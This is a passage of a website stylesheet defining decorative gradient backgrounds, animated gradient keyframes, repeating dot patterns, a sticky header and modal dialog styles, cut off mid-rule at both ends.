  background: linear-gradient(126.95deg,#91A2CD 0%,#008716 51.69%,#FF9900 100%), linear-gradient(126.95deg,#FFFFFF 0%,#00273D 49.48%,#FF9900 100%), radial-gradient(100% 216.55% at 100% 100%,#A4BE00 0%,#6100FF 100%), linear-gradient(307.27deg,#1DAC92 0.37%,#2800C6 100%), radial-gradient(100% 140% at 100% 0%,#EAFF6B 0%,#006C7A 57.29%,#2200AA 100%);
  background-blend-mode: overlay, overlay, difference, difference, normal;
}
.dark-hope {
  background: radial-gradient(92.72% 100% at 50% 0%,rgba(215,215,215,0.5) 0%,rgba(0,0,0,0.5) 100%), radial-gradient(92.72% 100% at 50% 0%,#FF0000 0%,#000000 100%), radial-gradient(109.21% 213.32% at 100% 0%,#000AFF 0%,#70FF00 100%), radial-gradient(109.21% 213.32% at 100% 0%,#FF4D00 0%,#00C2FF 100%), linear-gradient(127.43deg,#D50000 0%,#7856FF 100%);
  background-blend-mode: overlay, difference, difference, difference, normal;
}
.dual-glitch {
  background: linear-gradient(151.47deg,#0500FF 0.49%,rgba(1,0,26,0) 32.86%), linear-gradient(238.72deg,#FFFFFF 0%,#1F001C 100%), radial-gradient(100% 143.09% at 100% 0%,#000000 0%,#FFC700 100%), radial-gradient(100% 143.09% at 100% 0%,#5200FF 0%,#00113D 100%), radial-gradient(59.5% 100% at 49.32% 0%,#FF8A00 0%,#001AFF 100%), linear-gradient(121.28deg,#DBFF00 0%,#3300FF 100%), linear-gradient(121.28deg,#FF8A00 0%,#001AFF 100%), linear-gradient(180deg,#33FF00 0%,#FF0000 100%), radial-gradient(70.71% 99% at 100% 39.75%,#8000FF 0%,#FF0000 100%), radial-gradient(70.41% 100% at 50% 0%,#D5B300 0%,#00AA96 100%);
  background-blend-mode: luminosity, soft-light, color-dodge, overlay, overlay, difference, difference, exclusion, difference, normal;
}
.ethical-destiny {
  background: linear-gradient(121.28deg,#000000 0%,#FFFFFF 100%), linear-gradient(121.28deg,#FFB800 0%,#FFFFFF 100%), linear-gradient(140.54deg,#7000FF 0%,#001AFF 72.37%), linear-gradient(307.43deg,#FFE927 0%,#00114D 100%), radial-gradient(107% 142.8% at 15.71% 104.5%,#FFFFFF 0%,#A7AA00 100%), radial-gradient(100.22% 100% at 70.57% 0%,#7A3B00 0%,#1DAC92 100%);
  background-blend-mode: difference, soft-light, difference, difference, difference, exclusion;
}
.twisted-fire {
  background: linear-gradient(114.95deg,#3A003C 0%,rgba(0,71,255,0) 53.31%), linear-gradient(180deg,#00647A 0%,#FFA7A7 100%), linear-gradient(244.35deg,#FFB26A 0%,#C15151 50.58%,#00A3FF 100%), linear-gradient(244.35deg,#E03F3F 0%,#001665 49.48%,#FF0000 100%), radial-gradient(100% 233.99% at 0% 100%,#FF0000 0%,#AD00FF 100%), linear-gradient(307.27deg,#096F5C 0.37%,#687EB5 50.19%,#8877CE 100%), radial-gradient(100% 140% at 100% 0%,#FF00C7 0%,#006C7A 49.48%,#760000 100%);
  background-blend-mode: overlay, overlay, overlay, overlay, difference, color-dodge, normal;
}
.golden-pond {
  background: radial-gradient(ellipse farthest-corner at right bottom,#FEDB37 0%,#FDB931 8%,#9f7928 30%,#8A6E2F 40%,transparent 80%), radial-gradient(ellipse farthest-corner at left top,#FFFFFF 0%,#FFFFAC 8%,#D1B464 25%,#5d4a1f 62.5%,#5d4a1f 100%);
}
.bluish-star {
  background: linear-gradient(calc(126deg),rgba(163,163,163,0.09) 0%,rgba(163,163,163,0.09) 33.3%,rgba(100,100,100,0.09) 33.3%,rgba(100,100,100,0.09) 66.6%,rgba(162,162,162,0.09) 66.6%,rgba(162,162,162,0.09) 99%), linear-gradient(calc(332deg),rgba(193,193,193,0.06) 0%,rgba(193,193,193,0.06) 33.3%,rgba(169,169,169,0.06) 33.3%,rgba(169,169,169,0.06) 66.6%,rgba(92,92,92,0.06) 66.6%,rgba(92,92,92,0.06) 99%), linear-gradient(calc(203deg),rgba(45,45,45,0.03) 0%,rgba(45,45,45,0.03) 33.3%,rgba(223,223,223,0.03) 33.3%,rgba(223,223,223,0.03) 66.6%,rgba(173,173,173,0.03) 66.6%,rgba(173,173,173,0.03) 99%), linear-gradient(calc(354deg),rgba(226,226,226,0.06) 0%,rgba(226,226,226,0.06) 33.3%,rgba(81,81,81,0.06) 33.3%,rgba(81,81,81,0.06) 66.6%,rgba(186,186,186,0.06) 66.6%,rgba(186,186,186,0.06) 99%), linear-gradient(calc(159deg),rgba(225,225,225,0.04) 0%,rgba(225,225,225,0.04) 33.3%,rgba(95,95,95,0.04) 33.3%,rgba(95,95,95,0.04) 66.6%,rgba(39,39,39,0.04) 66.6%,rgba(39,39,39,0.04) 99%), linear-gradient(calc(202deg),rgba(184,184,184,0.06) 0%,rgba(184,184,184,0.06) 33.3%,rgba(0,0,0,0.06) 33.3%,rgba(0,0,0,0.06) 66.6%,rgba(140,140,140,0.06) 66.6%,rgba(140,140,140,0.06) 99.9%), linear-gradient(calc(397deg),rgba(40,40,40,0.07) 0%,rgba(40,40,40,0.07) 33.3%,rgba(214,214,214,0.07) 33.3%,rgba(214,214,214,0.07) 66.6%,rgba(190,190,190,0.07) 66.6%,rgba(190,190,190,0.07) 99.9%), linear-gradient(calc(135deg),rgba(230,230,230,0) 0%,rgba(230,230,230,0) 33.3%,rgba(241,241,241,0) 33.3%,rgba(241,241,241,0) 66.6%,rgba(55,55,55,0) 66.6%,rgba(55,55,55,0) 99%), linear-gradient(calc(74deg),#ba26e3,#0f0bef), radial-gradient(100% 140% at 100% 0%,rgba(0,0,0,0.7) 0%,transparent 50%,rgba(0,0,0,0.7) 100%);
}
.redish-star {
  background: linear-gradient(calc(120deg),rgba(163,163,163,0.09) 0%,rgba(163,163,163,0.09) 33.3%,rgba(100,100,100,0.09) 33.3%,rgba(100,100,100,0.09) 66.6%,rgba(162,162,162,0.09) 66.6%,rgba(162,162,162,0.09) 99%), linear-gradient(calc(326deg),rgba(193,193,193,0.06) 0%,rgba(193,193,193,0.06) 33.3%,rgba(169,169,169,0.06) 33.3%,rgba(169,169,169,0.06) 66.6%,rgba(92,92,92,0.06) 66.6%,rgba(92,92,92,0.06) 99%), linear-gradient(calc(197deg),rgba(45,45,45,0.03) 0%,rgba(45,45,45,0.03) 33.3%,rgba(223,223,223,0.03) 33.3%,rgba(223,223,223,0.03) 66.6%,rgba(173,173,173,0.03) 66.6%,rgba(173,173,173,0.03) 99%), linear-gradient(calc(348deg),rgba(226,226,226,0.06) 0%,rgba(226,226,226,0.06) 33.3%,rgba(81,81,81,0.06) 33.3%,rgba(81,81,81,0.06) 66.6%,rgba(186,186,186,0.06) 66.6%,rgba(186,186,186,0.06) 99%), linear-gradient(calc(153deg),rgba(225,225,225,0.04) 0%,rgba(225,225,225,0.04) 33.3%,rgba(95,95,95,0.04) 33.3%,rgba(95,95,95,0.04) 66.6%,rgba(39,39,39,0.04) 66.6%,rgba(39,39,39,0.04) 99%), linear-gradient(calc(196deg),rgba(184,184,184,0.06) 0%,rgba(184,184,184,0.06) 33.3%,rgba(0,0,0,0.06) 33.3%,rgba(0,0,0,0.06) 66.6%,rgba(140,140,140,0.06) 66.6%,rgba(140,140,140,0.06) 99.9%), linear-gradient(calc(391deg),rgba(40,40,40,0.07) 0%,rgba(40,40,40,0.07) 33.3%,rgba(214,214,214,0.07) 33.3%,rgba(214,214,214,0.07) 66.6%,rgba(190,190,190,0.07) 66.6%,rgba(190,190,190,0.07) 99.9%), linear-gradient(calc(129deg),rgba(230,230,230,0) 0%,rgba(230,230,230,0) 33.3%,rgba(241,241,241,0) 33.3%,rgba(241,241,241,0) 66.6%,rgba(55,55,55,0) 66.6%,rgba(55,55,55,0) 99%), linear-gradient(calc(68deg),#e37b26,#ef0b53), radial-gradient(100% 140% at 100% 0%,rgba(0,0,0,0.7) 0%,transparent 50%,rgba(0,0,0,0.7) 100%);
}
.greenish-star {
  background: linear-gradient(calc(120deg),rgba(163,163,163,0.09) 0%,rgba(163,163,163,0.09) 33.3%,rgba(100,100,100,0.09) 33.3%,rgba(100,100,100,0.09) 66.6%,rgba(162,162,162,0.09) 66.6%,rgba(162,162,162,0.09) 99%), linear-gradient(calc(326deg),rgba(193,193,193,0.06) 0%,rgba(193,193,193,0.06) 33.3%,rgba(169,169,169,0.06) 33.3%,rgba(169,169,169,0.06) 66.6%,rgba(92,92,92,0.06) 66.6%,rgba(92,92,92,0.06) 99%), linear-gradient(calc(197deg),rgba(45,45,45,0.03) 0%,rgba(45,45,45,0.03) 33.3%,rgba(223,223,223,0.03) 33.3%,rgba(223,223,223,0.03) 66.6%,rgba(173,173,173,0.03) 66.6%,rgba(173,173,173,0.03) 99%), linear-gradient(calc(348deg),rgba(226,226,226,0.06) 0%,rgba(226,226,226,0.06) 33.3%,rgba(81,81,81,0.06) 33.3%,rgba(81,81,81,0.06) 66.6%,rgba(186,186,186,0.06) 66.6%,rgba(186,186,186,0.06) 99%), linear-gradient(calc(153deg),rgba(225,225,225,0.04) 0%,rgba(225,225,225,0.04) 33.3%,rgba(95,95,95,0.04) 33.3%,rgba(95,95,95,0.04) 66.6%,rgba(39,39,39,0.04) 66.6%,rgba(39,39,39,0.04) 99%), linear-gradient(calc(196deg),rgba(184,184,184,0.06) 0%,rgba(184,184,184,0.06) 33.3%,rgba(0,0,0,0.06) 33.3%,rgba(0,0,0,0.06) 66.6%,rgba(140,140,140,0.06) 66.6%,rgba(140,140,140,0.06) 99.9%), linear-gradient(calc(391deg),rgba(40,40,40,0.07) 0%,rgba(40,40,40,0.07) 33.3%,rgba(214,214,214,0.07) 33.3%,rgba(214,214,214,0.07) 66.6%,rgba(190,190,190,0.07) 66.6%,rgba(190,190,190,0.07) 99.9%), linear-gradient(calc(129deg),rgba(230,230,230,0) 0%,rgba(230,230,230,0) 33.3%,rgba(241,241,241,0) 33.3%,rgba(241,241,241,0) 66.6%,rgba(55,55,55,0) 66.6%,rgba(55,55,55,0) 99%), linear-gradient(calc(68deg),#26e3cd,#0bef26), radial-gradient(100% 140% at 100% 0%,rgba(0,0,0,0.7) 0%,transparent 50%,rgba(0,0,0,0.7) 100%);
}
.spectar {
  background: linear-gradient(-45deg,#FFFF4F,#ee7752,#e73c7e,#23a6d5,#23d5ab,#70FF88);
}
.burst-spectrum {
  background: linear-gradient(90deg,#5461c8 12.5%,#c724b1 25%,#e4002b 37.5%,#ff6900 50%,#f6be00 62.5%,#97d700 75%,#00ab84 87.5%,#00a3e0 100%);
}
.undefined-waves {
  background: linear-gradient(301.28deg,#00C2FF 54.38%,rgba(0,255,224,0) 100%), linear-gradient(129.96deg,#FF2F2F 10.43%,#000460 92.78%), radial-gradient(100% 246.94% at 100% 0%,#8000FF 0%,#BA75FF 54.17%,#FF0000 100%), linear-gradient(58.72deg,#2200F2 0%,#530000 100%), linear-gradient(154.03deg,#FF0000 0%,#00FF94 74.04%), linear-gradient(301.27deg,#FF0000 0%,#0038FF 84.63%), linear-gradient(136.23deg,#00C2FF 11.12%,#FF0000 86.47%), radial-gradient(57.37% 100% at 50% 0%,#B50000 0%,#0034BB 100%);
  background-blend-mode: multiply, overlay, color-burn, screen, difference, difference, difference, normal;
}
.invisible-life {
  background: radial-gradient(50% 123.47% at 50% 50%,#000000 0%,#FFFFFF 100%), radial-gradient(100% 100% at 50% 100%,#E9FFD8 0%,#001356 100%), linear-gradient(238.72deg,#0066FF 0%,#00CD21 100%), radial-gradient(100% 188.01% at 76.14% 0%,#00CAF7 0%,#FF00C7 100%), linear-gradient(0deg,#00C2FF 0%,#FFC700 100%), radial-gradient(59.2% 100% at 50% 0%,#8000FF 0%,#0085FF 100%), radial-gradient(100% 148.07% at 0% 0%,#FC8800 0%,#00FF94 100%);
  background-blend-mode: overlay, multiply, hard-light, color-dodge, color-burn, color-burn, normal;
}
.leaf-rainbow {
  background: radial-gradient(70.71% 99% at 100% 39.75%,#7700D5 0%,#000000 100%), radial-gradient(70.41% 100% at 50% 0%,#D5B300 0%,#2200AA 100%);
  background-blend-mode: difference, normal;
}
.rainbow-burst {
  background: linear-gradient(153.03deg,#0500FF 16.92%,#000000 87.01%), linear-gradient(121.28deg,#FFFFFF 70.31%,rgba(25,0,177,0.85) 100%), linear-gradient(195.81deg,#FFB6B6 8.74%,#00492F 100%), linear-gradient(269.62deg,#FFFFFF 0.44%,#0077AA 99.56%), radial-gradient(77.85% 100% at 50% 0%,#6BFF71 0%,#190024 100%), linear-gradient(339.45deg,#00FF38 1.34%,#FF0000 73.07%), linear-gradient(201.13deg,#22F400 -0.47%,#DBFF00 100%), linear-gradient(94.04deg,#18007A 0%,#00D5C8 51.04%,#F4FF75 100%), #FFFFFF;
  background-blend-mode: exclusion, multiply, overlay, multiply, color-dodge, difference, difference, normal, normal;
}
.gentle-space {
  background-image: linear-gradient(to right top,#d16ba5,#c777b9,#ba83ca,#aa8fd8,#9a9ae1,#8aa7ec,#79b3f4,#69bff8,#52cffe,#41dfff,#46eefa,#5ffbf1);
}
.highlight-space {
  background-image: linear-gradient(25deg,#d16ba5,#c974b9,#bc7ecc,#ab88dc,#9693e9,#7e93e4,#6792dd,#5191d4,#3d84ba,#2f76a1,#286887,#25596f), radial-gradient(85% 100% at 55% 25%,transparent 10%,rgba(255,175,170,0.7) 100%);
  background-blend-mode: multiply, multiply;
}
.abstract-leafs {
  background: linear-gradient(235deg,#BABC4A 0%,#000000 100%), linear-gradient(235deg,#0026AC 0%,#282534 100%), linear-gradient(235deg,#00FFD1 0%,#000000 100%), radial-gradient(120% 185% at 25% -25%,#EEEEEE 0%,#EEEEEE 40%,#7971EA calc(41%),#7971EA 50%,#393E46 calc(51%),#393E46 70%,#222831 calc(71%),#222831 100%), radial-gradient(70% 140% at 90% 10%,#F5F5C6 0%,#F5F5C6 30%,#7DA87B calc(31%),#7DA87B 60%,#326765 calc(61%),#326765 80%,#27253D calc(81%),#27253D 100%);
  background-blend-mode: overlay, lighten, overlay, color-burn, normal;
}
.light-divider {
  background: linear-gradient(129.96deg,#FF2F2F 10.43%,#000460 92.78%), radial-gradient(100% 246.94% at 100% 0%,#FFFFFF 0%,#020063 100%), linear-gradient(121.18deg,#1400FF 0.45%,#3A0000 100%), linear-gradient(154.03deg,#FF002E 0%,#FF003D 74.04%), linear-gradient(341.1deg,#B25BBA 7.52%,#1700A7 77.98%), linear-gradient(222.34deg,#0047FF 12.99%,#FF0000 87.21%), linear-gradient(150.76deg,#B7D500 15.35%,#2200AA 89.57%);
  background-blend-mode: overlay, color-burn, screen, overlay, difference, difference, normal;
}
.luminosity-rings {
  background: linear-gradient(129.96deg,#FF2F2F 10.43%,#000460 92.78%), radial-gradient(70% 140% at 90% 10%,#F5F5C6 0%,#F5F5C6 30%,#7DA87B calc(31%),#7DA87B 60%,#326765 calc(61%),#326765 80%,#27253D calc(81%),#27253D 100%), radial-gradient(100% 246.94% at 100% 0%,#FFFFFF 0%,transparent 100%), linear-gradient(121.18deg,#1400FF 0.45%,#3A0000 100%), linear-gradient(154.03deg,#FF002E 0%,#FF003D 74.04%), linear-gradient(341.1deg,#B25BBA 7.52%,#1700A7 77.98%), linear-gradient(222.34deg,#0047FF 12.99%,transparent 87.21%), linear-gradient(150.76deg,#B7D500 15.35%,#2200AA 89.57%);
  background-blend-mode: overlay, color-burn, screen, screen, saturation, difference, saturation, darken;
}
.nova-rings {
  background: linear-gradient(129.96deg,#FF2F2F 10.43%,#000460 92.78%), radial-gradient(100% 246.94% at 100% 0%,#FFFFFF 0%,transparent 100%), linear-gradient(121.18deg,#1400FF 0.45%,#3A0000 100%), radial-gradient(70% 140% at 90% 10%,#F5F5C6 0%,#F5F5C6 30%,#7DA87B calc(31%),#7DA87B 60%,#326765 calc(61%),#326765 80%,#27253D calc(81%),#27253D 100%), linear-gradient(154.03deg,#FF002E 0%,#FF003D 74.04%), linear-gradient(341.1deg,#B25BBA 7.52%,#1700A7 77.98%), linear-gradient(222.34deg,#0047FF 12.99%,#FF0000 87.21%), linear-gradient(150.76deg,#B7D500 15.35%,#2200AA 89.57%);
  background-blend-mode: overlay, color-burn, screen, overlay, saturation, difference, color, color;
}
.coming-light {
  background: linear-gradient(129.96deg,#FF2F2F 10.43%,#000460 92.78%), radial-gradient(100% 246.94% at 100% 0%,#FFFFFF 0%,#020063 100%), linear-gradient(121.18deg,#1400FF 0.45%,#3A0000 100%), linear-gradient(154.03deg,#FF002E 0%,#FF003D 74.04%), linear-gradient(341.1deg,#B25BBA 7.52%,#1700A7 77.98%), linear-gradient(222.34deg,#0047FF 12.99%,#FF0000 87.21%), linear-gradient(150.76deg,#B7D500 15.35%,#2200AA 89.57%);
  background-blend-mode: overlay, luminosity, screen, overlay, difference, difference, normal;
}
.orange-sparkle {
  background: linear-gradient(129.96deg,#FF2F2F 10.43%,#000460 92.78%), radial-gradient(100% 246.94% at 100% 0%,#FFFFFF 0%,yellow 100%), linear-gradient(121.18deg,#1400FF 0.45%,#3A0000 100%), linear-gradient(154.03deg,#FF002E 0%,#FF003D 74.04%), linear-gradient(341.1deg,#B25BBA 7.52%,#1700A7 77.98%), linear-gradient(222.34deg,#0047FF 12.99%,#FF0000 87.21%), linear-gradient(150.76deg,#B7D500 15.35%,#2200AA 89.57%);
  background-blend-mode: overlay, color, screen, overlay, difference, difference, normal;
}
.luminosity-gemstones {
  background: radial-gradient(100% 246.94% at 100% 0%,#fff 0%,#333 100%), linear-gradient(121.18deg,#1400FF 0.45%,#3A0000 100%), linear-gradient(154.03deg,#FF002E 0%,#FF003D 74.04%), linear-gradient(341.1deg,#fff 7.52%,#1700A7 77.98%), linear-gradient(222.34deg,#0047FF 12.99%,#FF2F2F 87.21%), linear-gradient(150.76deg,#B7D500 15.35%,#2200AA 89.57%), #71f549;
  background-blend-mode: overlay, screen, saturation, overlay, difference, saturation;
}
.summer-joy {
  background: radial-gradient(100% 246.94% at 100% 0%,#fff 0%,transparent 100%), linear-gradient(121.18deg,orange 0.45%,#3A0000 100%), linear-gradient(154.03deg,#FF002E 0%,#fff 74.04%), linear-gradient(341.1deg,#fff 7.52%,#1700A7 77.98%), linear-gradient(222.34deg,#0047FF 12.99%,#FF2F2F 87.21%), linear-gradient(150.76deg,#B7D500 15.35%,#2200AA 89.57%);
  background-blend-mode: overlay, screen, saturation, overlay, difference, multiply;
}
.gentle-stars {
  background: radial-gradient(100% 246.94% at 100% 0%,#fff 0%,transparent 100%), linear-gradient(121.18deg,#1400FF 0.45%,#3A0000 100%), linear-gradient(154.03deg,#FF002E 0%,#fff 74.04%), linear-gradient(341.1deg,#fff 7.52%,#1700A7 77.98%), linear-gradient(222.34deg,#0047FF 12.99%,#FF2F2F 87.21%), linear-gradient(150.76deg,#B7D500 15.35%,#2200AA 89.57%);
  background-blend-mode: overlay, screen, saturation, overlay, difference, saturation, normal;
}
.warm-breeze {
  background: radial-gradient(100% 246.94% at 100% 0%,#fff 0%,transparent 100%), linear-gradient(121.18deg,#1400FF 0.45%,#3A0000 100%), linear-gradient(154.03deg,#FF002E 0%,#FF003D 74.04%), linear-gradient(341.1deg,#fff 7.52%,#1700A7 77.98%), linear-gradient(222.34deg,#0047FF 12.99%,#FF2F2F 87.21%), linear-gradient(150.76deg,#B7D500 15.35%,#2200AA 89.57%);
  background-blend-mode: overlay, screen, saturation, overlay, difference, saturation, normal;
}
.orange-summet {
  background: linear-gradient(129.96deg,#FF2F2F 10.43%,#000460 92.78%), radial-gradient(100% 246.94% at 100% 0%,#fff 0%,transparent 100%), linear-gradient(121.18deg,#1400FF 0.45%,#3A0000 100%), linear-gradient(154.03deg,#FF002E 0%,yellow 74.04%), linear-gradient(341.1deg,#B25BBA 7.52%,#1700A7 77.98%), linear-gradient(222.34deg,#0047FF 12.99%,#FF2F2F 87.21%), linear-gradient(150.76deg,#B7D500 15.35%,#2200AA 89.57%);
  background-blend-mode: overlay, screen, saturation, overlay, difference, saturation, normal;
}
.descend-sun {
  background: linear-gradient(45deg,#000850 0%,#000320 100%), radial-gradient(100% 225% at 100% 0%,#FF6928 0%,#000000 100%), linear-gradient(225deg,#FF7A00 0%,#000000 100%), linear-gradient(135deg,#CDFFEB 10%,#CDFFEB 35%,#009F9D 35%,#009F9D 60%,#07456F 60%,#07456F 67%,#0F0A3C 67%,#0F0A3C 100%);
  background-blend-mode: screen, overlay, hard-light, normal;
}
.vista-wallpaper {
  background: linear-gradient(180deg,#FFFFFF 0%,#000000 100%), linear-gradient(229.79deg,#7534FF 0%,#000000 94.19%), radial-gradient(56.26% 101.79% at 50% 0%,#8F00FF 0%,#493500 100%), linear-gradient(96.19deg,#D5B300 3.37%,#500052 96.63%);
  background-blend-mode: difference, difference, difference, normal;
}
.animated-gradient {
  -webkit-animation: animatedgradient 50s ease infinite;
  animation: animatedgradient 50s ease infinite;
  -webkit-transform: translate3d(0,0,0);
  transform: translate3d(0,0,0);
}
.animated-gradient-2 {
  -webkit-animation: animatedgradient2 50s ease infinite;
  animation: animatedgradient2 50s ease infinite;
  -webkit-transform: translate3d(0,0,0);
  transform: translate3d(0,0,0);
}
@-webkit-keyframes animatedgradient {
  0% {
    background-position: 0% 50%;
    background-size: 200% 200%;
  }
  25% {
    background-position: 100% 0%;
    background-size: 100% 100%;
  }
  50% {
    background-position: 0% 50%;
    background-size: 300% 600%;
  }
  75% {
    background-position: 100% 100%;
    background-size: 100% 200%;
  }
  100% {
    background-position: 0% 50%;
    background-size: 200% 200%;
  }
}
@keyframes animatedgradient {
  0% {
    background-position: 0% 50%;
    background-size: 200% 200%;
  }
  25% {
    background-position: 100% 0%;
    background-size: 100% 100%;
  }
  50% {
    background-position: 0% 50%;
    background-size: 200% 500%;
  }
  75% {
    background-position: 100% 100%;
    background-size: 100% 200%;
  }
  100% {
    background-position: 0% 50%;
    background-size: 200% 200%;
  }
}
@-webkit-keyframes animatedgradient2 {
  0% {
    background-position: 50% 50%;
    background-size: 100% 100%;
  }
  25% {
    background-position: 0% 100%;
    background-size: 100% 200%;
  }
  50% {
    background-position: 0% 50%;
    background-size: 200% 400%;
  }
  75% {
    background-position: 100% 0%;
    background-size: 200% 100%;
  }
  100% {
    background-position: 50% 50%;
    background-size: 100% 100%;
  }
}
@keyframes animatedgradient2 {
  0% {
    background-position: 50% 50%;
    background-size: 100% 100%;
  }
  25% {
    background-position: 0% 100%;
    background-size: 100% 200%;
  }
  50% {
    background-position: 0% 50%;
    background-size: 200% 400%;
  }
  75% {
    background-position: 100% 0%;
    background-size: 200% 100%;
  }
  100% {
    background-position: 50% 50%;
    background-size: 100% 100%;
  }
}
.pattern--1 {
  background-image: repeating-radial-gradient(circle at 50% 50%,#DA6527 25%,transparent 26%);
  background-size: 20px 20px;
  background-repeat: repeat;
}
.pattern--2 {
  background-image: repeating-radial-gradient(circle at 50% 50%,transparent 25%,#A59B52 26%,#A59B52 33%,transparent 34%);
  background-size: 30px 30px;
  background-repeat: repeat;
}
.pattern--3 {
  background-image: repeating-radial-gradient(circle at 50% 50%,#6AA065 50%,transparent 55%);
  background-size: 30px 30px;
  background-repeat: repeat;
}
.pattern--4 {
  background-image: repeating-radial-gradient(circle at 60% 40%,#4A4989 5%,#4A4989 7%,transparent 12%);
  background-size: 50px 50px;
  background-repeat: repeat;
}
.pattern--5 {
  background-image: repeating-radial-gradient(circle at 50% 50%,transparent 15%,#983C38 21%,transparent 22%);
  background-size: 25px 50px;
  background-repeat: repeat;
}
.pattern--6 {
  background-image: repeating-radial-gradient(circle at 50% 50%,#299A60 20%,transparent 21%);
  background-size: 20px 40px;
  background-repeat: repeat;
}
.pattern--7 {
  background-color: #E4B11A;
  background-image: repeating-radial-gradient(circle at 50% 50%,#fff 18%,transparent 20%);
  background-size: 51px 51px;
  background-repeat: repeat;
}
.pattern--8 {
  background-image: repeating-radial-gradient(circle at 50% 50%,transparent 49%,#348a8e 50%,#348a8e 60%,transparent 61%);
  background-size: 45px 15px;
  background-repeat: repeat;
}
.sp-sticky-logo {
  display: none;
}
.sticky__wrapper {
  left: 0;
  right: 0;
}
.sticky .sticky__wrapper {
  top: 0;
  position: fixed;
  -webkit-transform: translate3d(0,0,0);
  z-index: 111;
  -webkit-animation-name: fade-in-down;
  animation-name: fade-in-down;
  -webkit-animation-duration: 1s;
  animation-duration: 1s;
  -webkit-animation-fill-mode: forwards;
  animation-fill-mode: forwards;
  background-color: rgba(39,39,39,0.75);
  -webkit-backdrop-filter: blur(7px);
  backdrop-filter: blur(7px);
}
.sticky .sticky__wrapper .sp-sticky-logo {
  display: block;
  position: absolute;
  top: 0;
  max-height: 100%;
  padding: 5px 0;
  width: auto;
}
.sticky .sticky__wrapper .has-sticky-logo {
  display: none;
}
.sticky .transparent-wrapper {
  position: absolute;
  z-index: 9;
  left: 0;
  right: 0;
  margin: 0 auto;
}
.sticky #cd-lateral-nav {
  min-height: 100vh;
}
.sticky.white .sticky__wrapper,
.sticky.onepage .sticky__wrapper {
  background-color: rgba(255,255,255,0.8);
  box-shadow: 0 2px 6px rgba(0,0,0,0.1);
}
.sticky.transparent .sticky__wrapper {
  background: rgba(40,40,40,0.8);
  box-shadow: 0 2px 6px rgba(0,0,0,0.1);
}
@-webkit-keyframes header-in {
  0% {
    opacity: 0;
    -webkit-transform: translate3d(0,-20px,0) scale(0.9) perspective(1200px) rotateX(-60deg);
    transform: translate3d(0,-20px,0) scale(0.9) perspective(1200px) rotateX(-60deg);
  }
  100% {
    opacity: 1;
    -webkit-transform: translate3d(0,0,0) scale(1) perspective(800px) rotateX(0deg);
    transform: translate3d(0,0,0) scale(1) perspective(800px) rotateX(0deg);
  }
}
@keyframes header-in {
  0% {
    opacity: 0;
    -webkit-transform: translate3d(0,-20px,0) scale(0.9) perspective(1200px) rotateX(-60deg);
    transform: translate3d(0,-20px,0) scale(0.9) perspective(1200px) rotateX(-60deg);
  }
  100% {
    opacity: 1;
    -webkit-transform: translate3d(0,0,0) scale(1) perspective(800px) rotateX(0deg);
    transform: translate3d(0,0,0) scale(1) perspective(800px) rotateX(0deg);
  }
}
.header-in {
  -webkit-animation-name: header-in;
  animation-name: header-in;
  -webkit-transform-origin: 50% 0%;
  transform-origin: 50% 0%;
  -webkit-animation-duration: 1s;
  animation-duration: 1s;
  -webkit-animation-fill-mode: forwards;
  animation-fill-mode: forwards;
}
.flex-modal {
  display: none;
  position: fixed;
  z-index: 10091;
  padding: 0;
  top: 0;
  left: 0;
  outline: 0;
  margin: auto;
  width: 100vw;
  height: 100vh;
  overflow: auto;
  color: #000000;
}
.flex-modal.open-modal {
  display: block;
  -webkit-transform: translate3d(0,0,0);
  transform: translate3d(0,0,0);
  transform-style: preserve-3d;
  -webkit-backface-visibility: hidden;
  -webkit-animation: simple-fade .5s ease forwards;
  animation: simple-fade .5s ease forwards;
  background: rgba(0,0,0,0.35);
  -webkit-backdrop-filter: blur(0.1em) opacity(95%);
  backdrop-filter: blur(0.1em) opacity(95%);
}
.flex-modal.open-modal .flex-modal-content {
  background-color: #fff;
  width: 600px;
  margin: auto;
  padding: 30px;
  border: 0;
  outline: 0;
  overflow: hidden;
  border-radius: 7px;
  box-shadow: 0 4px 10px 0 rgba(0,0,0,0.2), 0 6px 55px 0 rgba(0,0,0,0.25);
  -webkit-animation: zoom_modal 1s ease forwards;
  animation: zoom_modal 1s ease forwards;
  transform-style: preserve-3d;
  top: 15vh;
}
.flex-modal.open-modal .flex-modal-content .flex-modal-body {
  padding: 20px;
  margin: 0;
  width: 100%;
  height: 100%;
  outline: 0;
  clear: both;
  display: block;
  overflow: hidden;
}
.flex-modal.open-modal .flex-modal-content .flex-modal-body .pretext,
.flex-modal.open-modal .flex-modal-content .flex-modal-body .posttext {
  text-align: left;
}
.flex-modal.open-modal .flex-modal-content .flex-modal-body .tm-img-wrapper > .img-responsive {
  display: block;
  width: 100%;
  height: 100%;
  margin: auto;
  padding: 0;
  outline: none;
  object-fit: cover;
}
.flex-modal.open-modal .flex-modal-content .flex-modal-header,
.flex-modal.open-modal .flex-modal-content .flex-modal-footer {
  padding: 10px 20px;
  margin: 0;
  clear: both;
  display: block;
}
.flex-modal.open-modal .flex-modal-content .flex-modal-header::after,
.flex-modal.open-modal .flex-modal-content .flex-modal-footer::after {
  clear: both;
  content: "";
  display: table;
}
.flex-modal.open-modal .flex-modal-content::after {
  clear: both;
  content: "";
  display: table;
}
.fm-close {
  position: absolute;
  z-index: 9;
  display: block;
  right: 0;
  top: 0;
  width: 55px;
  height: 50px;
  background: transparent;
  margin: 0;
  padding: 0;
  border: none;
  outline: 0;
  float: right;
  font-size: 38px;
  line-height: 38px;
  font-weight: bold;
}
.fm-close:hover,
.fm-close:focus {
  color: #777;
  text-decoration: none;
  cursor: pointer;
}
@media (max-width: 768px) {
  .flex-modal .flex-modal-content {
    width: 80%;
    padding: 25px 12px 30px;
  }
}
@media (max-width: 480px) {
  .flex-modal {
    padding: 2vh 0;
  }
  .flex-modal .flex-modal-content {
    width: 85%;
    padding: 15px 5px 30px;
    top: 10vh;
  }
}
@-webkit-keyframes simple-fade {
  0% {
    opacity: 0;
    visibility: hidden;
  }
  100% {
    opacity: 1;
    visibility: visible;
  }
}
@keyframes simple-fade {
  0% {
    opacity: 0;
    visibility: hidden;
  }
  100% {
    opacity: 1;
    visibility: visible;
  }
}
@-webkit-keyframes zoom_modal {
  0% {
    -webkit-transform: translate3d(0,-100px,0) scale(0.7) perspective(700px) rotateX(20deg);
    transform: translate3d(0,-100px,0) scale(0.7) perspective(700px) rotateX(20deg);
  }
  40% {
    -webkit-transform: translate3d(0,7px,0) scale(1.015);
    transform: translate3d(0,7px,0) scale(1.015);
  }
  80% {
    -webkit-transform: perspective(1000px) rotateX(0deg);
    transform: perspective(1000px) rotateX(0deg);
  }
  100% {
